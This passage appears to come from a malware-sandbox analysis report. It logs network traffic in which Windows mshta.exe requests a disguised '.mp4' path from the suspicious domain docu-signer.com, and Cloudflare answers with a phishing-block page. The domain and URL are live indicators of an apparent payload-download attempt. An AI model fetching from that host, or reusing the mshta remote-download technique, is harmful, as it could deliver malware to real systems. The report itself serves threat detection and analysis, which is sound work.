                                    Dec 31, 2024 15:41:50.355993032 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.356048107 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.356055021 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.356098890 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.356102943 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.356146097 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.360846996 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.360901117 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.360909939 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.360950947 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.360950947 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.360979080 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.361032009 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.361053944 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.365539074 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.365596056 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438179970 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438230991 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438234091 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438262939 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438298941 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438333035 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438338041 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438384056 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438785076 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438839912 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438844919 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438905001 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.438906908 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.438955069 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.439244986 CET49707443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.439261913 CET44349707104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.544245958 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.544292927 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:50.544373035 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.544749975 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:50.544768095 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.028227091 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.028289080 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.028681993 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.028688908 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.028939962 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.028944969 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.152869940 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.152935028 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.152945042 CET44349708104.21.87.65192.168.2.7
                                    Dec 31, 2024 15:41:51.152991056 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.153634071 CET49708443192.168.2.7104.21.87.65
                                    Dec 31, 2024 15:41:51.153656960 CET44349708104.21.87.65192.168.2.7

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 31, 2024 15:41:48.981556892 CET6369653192.168.2.71.1.1.1
                                    Dec 31, 2024 15:41:48.996767998 CET53636961.1.1.1192.168.2.7

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 31, 2024 15:41:48.981556892 CET192.168.2.71.1.1.10x528dStandard query (0)docu-signer.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 31, 2024 15:41:48.996767998 CET1.1.1.1192.168.2.70x528dNo error (0)docu-signer.com104.21.87.65A (IP address)IN (0x0001)false
                                    Dec 31, 2024 15:41:48.996767998 CET1.1.1.1192.168.2.70x528dNo error (0)docu-signer.com172.67.142.2A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • docu-signer.com
                                    • https:

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.749706104.21.87.654437764C:\Windows\System32\mshta.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-31 14:41:49 UTC346OUTGET /api/uz/0912545164/index.mp4 HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-CH
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: docu-signer.com
                                    Connection: Keep-Alive
                                    2024-12-31 14:41:49 UTC550INHTTP/1.1 403 Forbidden
                                    Date: Tue, 31 Dec 2024 14:41:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lomOCgu9kEEfK2C8kSDEi6gRxd1TFMSDdFXSc4UQzFI2wrJ%2FZxWDFtDHWYselPQvATrwRrXkj0bUUpB6KuFKvbKIKJjcHSi6bWun2Un87ZwfPsKciNFGQXhfPcN3eiMm3w8%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8fab085da9a372b9-EWR
                                    2024-12-31 14:41:49 UTC819INData Raw: 31 31 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 11dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-12-31 14:41:49 UTC1369INData Raw: 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69
                                    Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
                                    2024-12-31 14:41:49 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e
                                    Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn
                                    2024-12-31 14:41:49 UTC1023INData Raw: 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d
                                    Data Ascii: -ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:m
                                    2024-12-31 14:41:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.749707104.21.87.654437764C:\Windows\System32\mshta.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-31 14:41:50 UTC409OUTGET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                    Accept: */*
                                    Referer: https://docu-signer.com/api/uz/0912545164/index.mp4
                                    Accept-Language: en-CH
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: docu-signer.com
                                    Connection: Keep-Alive
                                    2024-12-31 14:41:50 UTC411INHTTP/1.1 200 OK
                                    Date: Tue, 31 Dec 2024 14:41:50 GMT
                                    Content-Type: text/css
                                    Content-Length: 24051
                                    Connection: close
                                    Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                    ETag: "675fc4ac-5df3"
                                    Server: cloudflare
                                    CF-RAY: 8fab086169390f69-EWR
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    Expires: Tue, 31 Dec 2024 16:41:50 GMT
                                    Cache-Control: max-age=7200
                                    Cache-Control: public
                                    Accept-Ranges: bytes
                                    2024-12-31 14:41:50 UTC958INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                    Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                    2024-12-31 14:41:50 UTC1369INData Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f
                                    Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
                                    2024-12-31 14:41:50 UTC1369INData Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d
                                    Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
                                    2024-12-31 14:41:50 UTC1369INData Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69
                                    Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
                                    2024-12-31 14:41:50 UTC1369INData Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73
                                    Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
                                    2024-12-31 14:41:50 UTC1369INData Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65
                                    Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
                                    2024-12-31 14:41:50 UTC1369INData Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c
                                    Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
                                    2024-12-31 14:41:50 UTC1369INData Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23
                                    Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
                                    2024-12-31 14:41:50 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e
                                    Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
                                    2024-12-31 14:41:50 UTC1369INData Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e
                                    Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.749708104.21.87.654437764C:\Windows\System32\mshta.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-31 14:41:51 UTC427OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                    Accept: */*
                                    Referer: https://docu-signer.com/api/uz/0912545164/index.mp4
                                    Accept-Language: en-CH
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
